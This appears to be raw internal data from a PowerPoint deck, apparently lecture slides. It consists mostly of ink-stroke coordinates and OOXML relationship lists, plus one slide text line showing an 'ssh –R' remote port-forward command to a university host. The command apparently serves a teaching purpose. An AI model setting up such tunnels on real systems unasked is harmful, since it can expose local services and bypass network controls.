0,-6 0 0,1 0 0,-5 0 0,-1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4:51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24575,'27'0'0,"-9"0"0,8 0 0,-14 0 0,4 0 0,5 0 0,-2 0 0,4 0 0,3 0 0,-13 0 0,14 0 0,-10 0 0,0 0 0,4 0 0,-10 0 0,10 0 0,-5 0 0,10 0 0,-3 0 0,3 0 0,-9 0 0,-7 0 0,-5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4:53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610 0 24575,'-33'0'0,"13"0"0,-11 0 0,19 0 0,-4 0 0,0 0 0,-1 0 0,-17 0 0,9 0 0,-3 0 0,1 0 0,3 0 0,-5 0 0,-9 0 0,7 0 0,1 10 0,4-2 0,-1 21 0,7-14 0,-10 15 0,18-14 0,-4 6 0,6 5 0,-2 1 0,1 1 0,0 9 0,4-8 0,-3 9 0,9-1 0,-4 3 0,5-1 0,0-6 0,0-6 0,0-12 0,0 11 0,0-4 0,5 17 0,6 1 0,17 20 0,13-1 0,-4-7 0,9-1 0,-26-32 0,5 0 0,-4-10 0,-3-9 0,14 4 0,-3-5 0,10 0 0,-4 0 0,10 0 0,-15 0 0,3 0 0,-16 0 0,9 0 0,-8 0 0,8 0 0,-5 0 0,-4 0 0,-2 0 0,-4 0 0,0 0 0,0 0 0,4 0 0,-3 0 0,9 0 0,-9-10 0,5 8 0,4-9 0,-8 11 0,8 0 0,-15 0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5T14:37:32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1 24575,'0'16'0,"0"2"0,0 29 0,0 4 0,0 8 0,-13 9 0,-2-27 0,0 12 0,-16 0 0,21-18 0,-36 35 0,24-40 0,-16 19 0,4-21 0,8 1 0,-7 0 0,16-7 0,2-6 0,9-1 0,1 2 0,5-5 0,0-3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5:01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24575,'16'0'0,"8"0"0,32 0 0,-6 0 0,29 0 0,9 0 0,-10 0 0,10 0 0,5 0 0,-38 0 0,1 0 0,4 0 0,2 0 0,2 0 0,-3 0 0,31 0 0,-3 0 0,-12 0 0,6 0 0,-8 0 0,0 0 0,-16-12 0,-5 10 0,11-10 0,-21 12 0,48-5 0,-48 3 0,48-3 0,-37 5 0,16 0 0,9 0 0,-33 0 0,14 0 0,-34 0 0,-5 5 0,-11-4 0,-1 4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5:03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 24575,'17'18'0,"1"3"0,5-8 0,1 4 0,-1-5 0,5 4 0,-9-4 0,2 0 0,-5-3 0,-4-7 0,4 3 0,-5 0 0,0-4 0,10 13 0,-8-11 0,13 12 0,-14-14 0,3 8 0,-4-3 0,-1 0 0,-4 4 0,4-4 0,-4 0 0,4-2 0,1 1 0,0-4 0,0 9 0,-1-9 0,1 4 0,0-5 0,-5 4 0,-7 2 0,-15 0 0,-8 4 0,-5-8 0,1 3 0,-6 0 0,8 1 0,-7 1 0,-22 8 0,30-12 0,-28 12 0,40-13 0,-13 8 0,2-4 0,-5 5 0,-4 1 0,15-6 0,-3-1 0,10 0 0,0-4 0,-4 9 0,-2-9 0,5 8 0,2-3 0,10 0 0,0-1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5:05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 5 24575,'-11'0'0,"-5"0"0,-2 0 0,0 0 0,-8 0 0,2 0 0,0 0 0,-13 0 0,22 0 0,-17 0 0,15 0 0,-1 0 0,3 0 0,-2 0 0,0 0 0,-1-5 0,1 14 0,6 15 0,-1 13 0,-4 19 0,8-9 0,-2-6 0,10-1 0,0-5 0,0 14 0,0 12 0,0-5 0,5 30 0,6-38 0,2 18 0,2-37 0,6 2 0,-13-13 0,25 7 0,-23-13 0,19 3 0,-12-4 0,4-5 0,6 4 0,-4-9 0,10 3 0,-5-4 0,30 0 0,-28 0 0,16 0 0,-36 0 0,1 0 0,0 0 0,0 0 0,-6 0 0,0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5:06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24575,'58'0'0,"-3"0"0,6 0 0,5 0 0,5 0 0,-17 0 0,1 0-375,18 0 1,-2 0 374,16 0 82,-13 0 0,3 0-82,-11 0 0,3 0 0,6 1 0,6-1 0,-8-1 0,-15-1 0,-4-2 0,16 2 0,-4-3 0,10-13 0,-11 4 0,-1-3 564,-30 11-564,-8 1 5,-9 0 0,-6 4 0,-6-4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5:07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24575,'11'0'0,"15"0"0,11 0 0,1 0 0,18 0 0,4 0 0,-8 0 0,4 0 0,-33 0 0,-2 0 0,-9 0 0,3 0 0,-9 5 0,-1 1 0,-5 5 0,0-1 0,0 1 0,0 4 0,-5-3 0,4 4 0,-9-6 0,9 1 0,-9 5 0,4-5 0,0 10 0,-3-10 0,8 10 0,-9 1 0,9 6 0,-9 1 0,9 3 0,-9-4 0,9-4 0,-9 12 0,4-11 0,-5 8 0,5-6 0,1-11 0,5-5 0,0-6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5:09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806 231 24575,'-7'-30'0,"1"9"0,-13-22 0,-19-2 0,8 15 0,-13-7 0,13 25 0,-5 5 0,2 1 0,0 6 0,-14 0 0,1 0 0,-21 0 0,12 0 0,-4 0 0,16 0 0,-9 16 0,16 8 0,-5 24 0,5 40 0,16-29 0,3 39 0,12-46 0,3 21 0,-3-10 0,5-2 0,0-8 0,9-13 0,-1-11 0,8-8 0,5 1 0,3 2 0,36 21 0,-8-3 0,27 5 0,-17-11 0,-4-7 0,-10-6 0,-3-10 0,-10-4 0,10-9 0,-4 0 0,-5 0 0,18-15 0,-15 0 0,12-8 0,-22 11 0,6-3 0,-21 13 0,7-8 0,-17 10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7:03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500 1 24575,'-16'0'0,"-2"0"0,-22 0 0,13 0 0,-20 0 0,22 0 0,-5 0 0,-10 0 0,8 10 0,-4-3 0,9 9 0,10 0 0,0-4 0,-8 18 0,11-16 0,-12 31 0,14-24 0,-5 22 0,6-15 0,0 6 0,4-5 0,2 9 0,5-8 0,0 9 0,0-6 0,11 17 0,-4-6 0,10 2 0,0-2 0,-4-18 0,4 7 0,-6-15 0,5 8 0,10 2 0,-11-4 0,9 1 0,-14-14 0,7 0 0,4 4 0,11-3 0,-8 4 0,8-6 0,-11 1 0,1-5 0,-6-1 0,9-5 0,-7 0 0,8 0 0,-9 0 0,4 0 0,1 0 0,7 0 0,5 0 0,-10 0 0,-3 0 0,4 0 0,-11 0 0,11-5 0,-19 4 0,-1-4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7:05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24575,'0'24'0,"0"3"0,0-3 0,0 12 0,0-4 0,0 9 0,0-5 0,0 3 0,0-3 0,0-7 0,0 1 0,0 38 0,0-10 0,0 33 0,0-34 0,0 0 0,0-13 0,0 13 0,0-17 0,0 23 0,10-11 0,-2-7 0,14 10 0,-10-35 0,5 6 0,4-10 0,-3-3 0,10 3 0,23-10 0,2 0 0,9-6 0,-24 0 0,-22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7:06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24575,'0'31'0,"0"10"0,10-15 0,4 25 0,9-29 0,-5 16 0,-1-20 0,5 10 0,-8 2 0,12 24 0,-18-13 0,13 41 0,-13-21 0,4-12 0,0 1 0,3 31 0,-2 16 0,-6-34 0,-2-1 0,-4 23 0,5-33 0,-1 0 0,-3 44 0,3-47 0,-5 27 0,0-55 0,0-10 0,0 0 0,0-1 0,0 6 0,0-4 0,0 3 0,0-9 0,0-1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7:08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24575,'0'94'0,"0"-27"0,0 8 0,0 3 0,0 4 0,0-5 0,0-2 0,0-1 0,0 21 0,0-47 0,0-9 0,0-10 0,0-6 0,0-12 0,0 4 0,0-3 0,0 4 0,0-1 0,0-8 0,0 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5T14:37:33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24575,'0'22'0,"0"-2"0,0 16 0,0-5 0,0 6 0,0 1 0,0 4 0,0 8 0,0 3 0,0-15 0,0 9 0,0-22 0,0 10 0,0-3 0,0-8 0,0 3 0,0-4 0,0 1 0,0 23 0,10-14 0,-3 4 0,8-18 0,-4-17 0,0 2 0,4-4 0,2 5 0,10-4 0,1 4 0,6-5 0,10 5 0,-18-4 0,16 8 0,-29-7 0,8 2 0,-5-4 0,-4 0 0,13 0 0,-3 0 0,1 0 0,-8 5 0,-10 1 0,-5 0 0,0-1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7:09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0 363 24575,'0'-11'0,"0"0"0,0-10 0,0 8 0,0-14 0,0 5 0,17-4 0,-8 3 0,30-10 0,-9 8 0,6-5 0,8 3 0,-12 8 0,24 6 0,4 1 0,-4-7 0,0 11 0,0 3 0,-8-1 0,2 1 0,11 4 0,-12-4 0,2 5 0,11 0 0,-21 0 0,18 0 0,-35 5 0,4 1 0,-6 10 0,6 2 0,1 4 0,-1 5 0,1 14 0,-1 8 0,-3 11 0,5 15 0,0 6 0,-14-13 0,6 24 0,-21-31 0,5 18 0,-6-1 0,0-32 0,0 30 0,-16-36 0,2 16 0,-19-22 0,4-7 0,0-9 0,0-2 0,-11 1 0,-38 13 0,26-9 0,-28 8 0,38-12 0,-26-3 0,3 4 0,-13-6 0,17-5 0,-4-1 0,20-6 0,-4 0 0,15 0 0,9 0 0,-1 0 0,20 0 0,1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7:09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7:1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24575,'0'30'0,"0"-6"0,0 23 0,0-13 0,0 7 0,0-1 0,0-14 0,0 2 0,0-6 0,0-10 0,0 4 0,0-5 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0-4 0,0-1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7:13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0 24575,'-11'0'0,"1"0"0,-1 0 0,0 0 0,0 0 0,-5 0 0,4 0 0,-5 5 0,6 1 0,-4 5 0,3-5 0,1 3 0,1-8 0,4 9 0,-5-4 0,5 5 0,-3-1 0,3-4 0,-5 4 0,5-4 0,-9 4 0,8 1 0,-8 0 0,4-1 0,0 1 0,5 0 0,6-5 0,6-1 0,9-5 0,-3 4 0,19 12 0,-17-3 0,12 8 0,-5-10 0,-3 4 0,14 6 0,-10 2 0,0-6 0,-2 2 0,-8-12 0,8 8 0,-3 1 0,9-4 0,3 9 0,-1-9 0,5 4 0,-11-5 0,1-1 0,-8-4 0,-4-1 0,-5 5 0,-2-8 0,-4 7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7:18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24575,'11'0'0,"10"0"0,-2 0 0,9 0 0,0 0 0,-4 0 0,-1 0 0,-2 0 0,8 0 0,-4 0 0,14 0 0,-16 0 0,15 0 0,-13 0 0,13 0 0,1 0 0,-8 0 0,-4 0 0,-18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7:19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24575,'33'0'0,"-5"0"0,27 0 0,2 0 0,0 0 0,-1 0 0,-11 0 0,3 0 0,4 0 0,-2 0 0,-1 0 0,-15 0 0,-9 0 0,1 0 0,-14 0 0,-1 0 0,-7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7:22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0 805 24575,'0'30'0,"0"23"0,0 14 0,0 7 0,0-14 0,0-2 0,0 2 0,0-8 0,0-3 0,0-7 0,0-4 0,0-8 0,0-17 0,0-20 0,0-17 0,0-32 0,0-3 0,0-30 0,0-9 0,0 2 0,0-2 0,0 40 0,0 2 0,0-24 0,0-17 0,0 42 0,0-7 0,0 17 0,0-5 0,10 13 0,-3 23 0,9-1 0,-6 15 0,1 0 0,0 5 0,10 23 0,0 8 0,4 13 0,18 21 0,-24-18 0,34 29 0,-31-39 0,18 26 0,-20-39 0,1 10 0,-5-18 0,-9-4 0,7-6 0,-8-1 0,5-15 0,-5-13 0,4-1 0,-3-41 0,6 15 0,-6-26 0,2 21 0,0-2 0,0-30 0,0 20 0,1 1 0,3-24 0,0 9 0,-1 8 0,-5 30 0,-2-1 0,0 22 0,1-6 0,5 11 0,0 3 0,-1 9 0,1 0 0,0 5 0,5 23 0,2-6 0,1 31 0,18 6 0,-13-7 0,1 4 0,21 28 0,-13-14 0,-3-3 0,-7-12 0,-1-5 0,1-1 0,3-2 0,4 5 0,-8-24 0,-1 14 0,-8-20 0,13 20 0,-19-21 0,8-4 0,-14-2 0,4-4 0,-1-5 0,-3-1 0,4-5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0:18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0:55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0 847 24575,'0'-37'0,"0"8"0,0-17 0,0 0 0,0 8 0,0-11 0,0 8 0,0-5 0,0-6 0,0 9 0,0 0 0,0 20 0,0 6 0,0 1 0,0-1 0,5-15 0,1-15 0,5 5 0,0 0 0,-6 25 0,5 1 0,-9 6 0,9-11 0,-4 3 0,0-3 0,3 5 0,-8 5 0,9 5 0,-4 1 0,4 5 0,6 10 0,-4-3 0,-2 14 0,5 1 0,-7 3 0,8 3 0,-4-5 0,4 5 0,2 1 0,-1 5 0,-1-6 0,-10-1 0,4-6 0,-4 20 0,0-20 0,-1 19 0,-1-23 0,-3 6 0,4-6 0,-5-1 0,5 9 0,-4-11 0,9 11 0,-9-14 0,4 0 0,-5-1 0,0 1 0,4-5 0,-2 4 0,7-4 0,-8 4 0,9 1 0,-9 0 0,4-1 0,-1-4 0,-2 4 0,2-4 0,1 0 0,-4 3 0,4-3 0,0 5 0,-4-5 0,4-2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0:56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24575,'11'0'0,"4"0"0,-3 0 0,4 0 0,-1 0 0,-3 0 0,3 0 0,-4 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,4 0 0,-3-10 0,4 7 0,0-7 0,-4 10 0,-2 0 0,-5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5T14:37:34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24575,'16'0'0,"2"0"0,26 0 0,-9 0 0,18 0 0,-22 0 0,5 0 0,-11 0 0,5 0 0,8 0 0,-1 0 0,9 0 0,-12 0 0,-1 0 0,-14-5 0,2-1 0,-5 0 0,2-4 0,-1 8 0,10-13 0,-13 12 0,17-7 0,-18 10 0,2-5 0,-10 4 0,-5-4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0:58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24575,'0'16'0,"0"13"0,0-3 0,0 8 0,0-6 0,0-9 0,0 8 0,0 1 0,0 7 0,0-5 0,0-9 0,0-16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1:00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24575,'11'0'0,"0"0"0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,6 5 0,-4-4 0,8 9 0,-8-9 0,3 8 0,-4-8 0,-5 9 0,3-4 0,-8 5 0,9-6 0,-9 5 0,4-4 0,-5 5 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,-5-1 0,-1-4 0,-5 4 0,0-9 0,1 4 0,-11 0 0,8 1 0,-12 4 0,8 1 0,-5 0 0,5-5 0,2-2 0,4-4 0,0 0 0,0 0 0,0 0 0,5 5 0,2 1 0,4 5 0,0-5 0,0-2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1:03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24575,'11'0'0,"4"0"0,-3 0 0,4 0 0,-6 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 5 0,0-4 0,-5 8 0,3-7 0,-3 2 0,5-4 0,-1 0 0,-4 5 0,-1 1 0,-5 5 0,0-1 0,0 1 0,0 0 0,0 0 0,5-6 0,1 11 0,5-4 0,1 16 0,4 1 0,1 0 0,0 3 0,-2-14 0,-9 3 0,4-15 0,-5-1 0,1-10 0,-1-1 0,-5-10 0,5-2 0,-3-10 0,8-1 0,-5 0 0,1 7 0,4 1 0,-9 9 0,9-8 0,-9 8 0,8-4 0,-8 5 0,9 5 0,-9-3 0,9 7 0,-9-7 0,8 8 0,-3-4 0,5 14 0,0-2 0,-5 9 0,3-1 0,-8-3 0,9 4 0,-9-6 0,9 6 0,-9-4 0,8 8 0,-3-8 0,5 3 0,-5-4 0,-1-5 0,-5-1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1:04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24575,'0'42'0,"0"14"0,0-40 0,0 15 0,0-10 0,0-8 0,0 8 0,0-10 0,0 4 0,0 2 0,0 0 0,0-2 0,0-4 0,0-1 0,0 1 0,0 0 0,0 15 0,0-2 0,0 10 0,0-6 0,0 2 0,0-5 0,5 19 0,1-22 0,6 30 0,-6-26 0,3 12 0,-3-11 0,0-5 0,4-6 0,-9-5 0,4-6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1:06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24575,'34'0'0,"-8"0"0,2 0 0,-2 0 0,-7 0 0,3 0 0,-5 0 0,-7 0 0,6 0 0,-4 0 0,3 0 0,-4 0 0,4 0 0,-3 0 0,4 0 0,-6 0 0,1 0 0,0 0 0,-1 5 0,-4 1 0,4 4 0,-9 1 0,4 0 0,-5-1 0,0 1 0,0 0 0,0 4 0,0-3 0,0 8 0,0-8 0,0 4 0,0-6 0,-5 6 0,-1 0 0,-5 1 0,5-2 0,-8-4 0,6 5 0,-17 5 0,7 2 0,-3-2 0,5-1 0,0-3 0,4-5 0,-3 2 0,4-8 0,0 0 0,5 3 0,-4-7 0,9 7 0,-4-3 0,5 0 0,0-1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0:21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0:23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0:29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1081 24575,'0'-31'0,"0"-5"0,0-20 0,0 5 0,0-12 0,0-6 0,0 18 0,0-20 0,0 0 0,0 3 0,0 3 0,0 10 0,0-24 0,0 21 0,0-33 0,5 35 0,-3 8 0,8 18 0,-9 9 0,9 15 0,-4 1 0,4 5 0,6 5 0,1 1 0,27 33 0,-15-16 0,22 23 0,-8 2 0,3 5 0,0 7 0,-10-6 0,0 0 0,8 15 0,-4-8 0,-10-15 0,-1-2 0,6 11 0,-4 1 0,1 1 0,2 3 0,-7-3 0,0-1 0,5-8 0,3 16 0,-12-30 0,-7-12 0,-10-6 0,-1-10 0,-5-2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0:30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24575,'16'0'0,"8"0"0,19 0 0,-2 0 0,16 0 0,-1 0 0,-14 0 0,11 0 0,-23 0 0,0 0 0,-7 0 0,-1 0 0,-10 0 0,4 0 0,-5 0 0,-1 0 0,6 0 0,-4 0 0,8 0 0,-4 0 0,6 0 0,-1 0 0,-4 0 0,-6 0 0,-7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21:33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5 461 23157,'-5'-11'0,"9"5"696,16-4-696,15 8 238,27-10-238,10 3 0,11 1 0,-9 1 0,15-1 0,-6 1 0,0 1 0,8 0-670,-11-1 0,16-1 0,9-1 1,5 0-1,-3 1 0,-8 1 670,-8 3 0,-5 1 0,-1 0 0,3 1 0,8-2 0,-12 1 0,5-1 0,4 0 0,2-1 0,1 1 0,0 0 0,-2 1 0,-3 1-540,3 0 0,-3 2 1,-1 0-1,0 0 0,0 1 1,1-1-1,2 1 540,-6-2 0,2 1 0,0 0 0,1-1 0,0 1 0,0 0 0,0 0 0,0 2 0,0-1 0,0 1 0,0 0 0,0 0 0,0 1 0,0 1 0,-1-1 0,-1 1 0,10 1 0,-1 1 0,-1 0 0,0 1 0,0 0 0,0 0 0,-1 1-578,-1-1 1,1 2 0,0 0 0,-1 0-1,-2 0 1,-3 0 0,-4-1 577,4 2 0,-3 0 0,-4 0 0,-2-1 0,-2-1-290,7 2 0,-2 0 0,-4-3 0,-6-5 290,26-10 0,-4-8 0,-23 0 0,0-4 0,-1 1 0,20-7 0,2-1 0,-10 4 0,5-2 0,0 3 0,-6 3 0,0 2 0,5 1 0,-6 2 0,5 1 0,3 0 0,4-1 0,-15 3 0,4-1 0,3 0 0,1 0 0,-2 0 0,-2 2-129,4 0 0,-1 0 0,-2 1 0,1 0 1,0 1 128,0 0 0,1 1 0,0 0 0,0 1 0,1 1 0,7 0 0,2 0 0,0 2 0,-4 0 0,-6 0 0,12 1 0,-8 1 0,10 2 0,-14 1 0,11 1 0,4 1 0,1 2 0,-3 3 0,-9 4 267,6 7 1,-8 5 0,-2 3 0,4 1-268,-6-3 0,3 1 0,0 2 0,-2 0 0,-3 1 0,3 6 0,-4 2 0,-2-2 0,-4-3 874,6-2 1,-4-3 0,-6-5-875,-1-3 0,-4-7 575,2-11 1,-3-4-576,31 2 0,-40-3 0,4-1 0,19-1 0,4-1 0,-6-2 0,7-1 0,-3 1 0,13 1 0,1 0 0,-8 0 0,-10 0 0,-4 1 0,5-1 0,8 0 0,8-1 0,1 1 0,-4 1 0,-10 3 0,-1 1 0,-3 0 0,-3 0 0,0-1 0,-3 0 0,2 1 0,21 0 0,4 2 0,-11 2 2165,-14 3 1,-6 2-2166,2 0 0,0 2 0,1 7 0,-3 1 0,28 5 0,-17 2 0,-2 0 0,-5-4 1094,0 1 1,2 0-1095,12-6 930,-31-7 0,2-2-930,-5-3 0,0 0 900,49-3-900,-15 0 0,-1 0 0,-8 0 0,-6 0 0,-12 0 0,-16 0 0,-11-11 0,0 3 0,11-9 0,10-6 0,-1 3 0,8-10 0,-7 6 0,-2 0 0,-3 6 0,-13 7 0,-10 6 0,-3 5 0,-9 0 0,-5 0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09868-4984-4439-841A-A4BCE328C799}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9/17/20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C7B9D-F085-422B-9867-FA60D9B284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9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bt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –R 8888:localhost:80 jrblack@moxie.cs.colorado.edu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C7B9D-F085-422B-9867-FA60D9B2847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9/17/20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9/17/20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9/17/20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9.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink67.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink80.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink54.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink62.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink75.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink83.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink87.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink53.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink57.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink61.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink70.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink74.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink78.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink50.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink82.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink86.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink52.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink65.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink69.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink56.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink73.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink77.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink81.xml"/><Relationship Id="rId75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9.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink60.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink64.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink51.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink68.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink72.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink76.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink85.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink48.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink55.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink63.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink71.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink84.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink47.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink58.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink66.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink79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4.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink98.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image107.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink119.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink130.xml"/><Relationship Id="rId16" 